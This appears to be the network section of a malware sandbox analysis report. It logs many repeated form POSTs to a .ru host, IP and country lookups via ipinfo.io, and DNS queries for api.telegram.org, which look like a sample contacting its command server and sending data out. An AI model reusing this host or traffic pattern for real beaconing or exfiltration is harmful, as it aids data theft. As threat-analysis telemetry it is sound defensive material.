                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1856 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2528 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1856 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2532 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 1856 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: 525833cm.nyashnyash.ru | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: 525833cm.nyashnyash.ru
